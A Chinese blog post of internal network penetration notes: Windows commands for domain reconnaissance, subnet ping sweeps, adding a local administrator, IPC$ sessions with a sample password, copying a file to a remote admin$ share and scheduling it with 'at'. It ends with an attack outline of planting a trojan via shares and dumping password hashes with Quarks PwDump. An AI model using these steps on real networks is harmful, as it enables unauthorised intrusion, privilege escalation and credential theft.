内网渗透笔记(二)

本文介绍了内网渗透中常用的系统命令,如查看系统环境变量、用户账号、IP地址等。还分享了信息收集小技巧,包括查找内网C段存活主机、判断主域等。此外,阐述了内网渗透流程,并推荐了抓HASH工具Quarks PwDump。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

常用系统命令

信息收集

set ----- 查看系统环境变量
whoami -----查询当前的用户账号
ipconfig /all -----查看本机的IP地址
net user -----本机用户列表
net user test test /add -----添加用户
net localgroup administrators test /add -----账户提升为管理员权限
net localgroup administrators -----查看某个用户组的详细信息,包括其注释、用户组的成员等
systeminfo -----查看系统信息
winver -----检查Windows详细版本
tasklist /svc -----查看有哪些进程
netstat -ano ----- 查看有哪些网络连接端口
net use \ip\ipc$ pawword /user:username -----建立IPC会话
net user /domain ------ 查询域用户
net view /domain ------ 查询域列表
net view /domain:domainname ------ 查看workgroup域中计算机列表
net group “domain admins” /domain -----查看域管理员
net user administrator(域用户) /domain -----获取域某用户的详细信息
net view ------ 查询同一域内机器列表
arp -a -----查看本地存储的arp地址数据
net view \ip ------ 查询某IP共享
net group /domain ------ 查询域里面的工作组
net group “Domain Controllers” /domain -----查看域控制器
net localgroup administrators /domain ------ 登录本机的域管理员
net localgroup administrators workgroup\user001 /add ------域用户添加到本机
net time /domain ------ 判断主域,主域服务器都做时间服务器
net config workstation ------ 当前登录域

小技巧:

1、tasklist /svc 查看服务,找到PID,然后通过netstat –ano 找到PID对应的端口

C:\>tasklist /svc   //找到 TermService对应PID为1128
svchost.exe                   1128             TermService
 
C:\>netstat -ano
Active Connections
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       688
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:1025           0.0.0.0:0              LISTENING       424
  TCP    0.0.0.0:3399           0.0.0.0:0              LISTENING       1128
//确认3399为远程端口

2、内网C段存活主机查找

for /l %i in (1,1,255) do @ping 10.9.10.%i -w 1 -n 1 | find /i "ttl"
//来自 10.9.10.1 的回复: 字节=32 时间=4ms TTL=61

3、域服务器

一般情况下,域服务器跟DNS服务器都是同一台机器,

nbtstat 命令 nbtstat -a test.com

ping 命令 ping test.com

4、IPC$连接

net use \\10.9.10.201\ipc$ abc123! /user:administrator
net use \\10.9.10.201\ipc$ abc123! /user:test.com\administrator
 
 
net use * /del /yes
 
copy 111.txt \\10.9.10.201\admin$
net time \\10.9.10.201
at \\10.9.10.201 1:40 111.txt

5、内网渗透流程

A、获取一台服务器权限,通过这台服务器进行内网信息收集,如有几个域,域管理员账号,域内共享。

B、有共享可考虑通过共享写入木马,接着上传抓HASH工具,抓取本地HASH,获取到域管理员administrator账号

抓hash工具
Quarks PwDump
下载源代码下载地址:https://codeload.github.com/quarkslab/quarkspwdump/zip/master
uarks PwDump是quarkslab出品的一款用户密码提取开源工具,目前软件最新版本为0.2b。目前它支持Windows XP/2003/Vista/7/2008版本,且相当稳定。可以抓取windows平台下多种类型的用户凭据,包括:本地帐户、域帐户、缓存的域帐户和Bitlocker。

参考文章:https://netsecurity.51cto.com/art/201602/506072.htm?pc

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值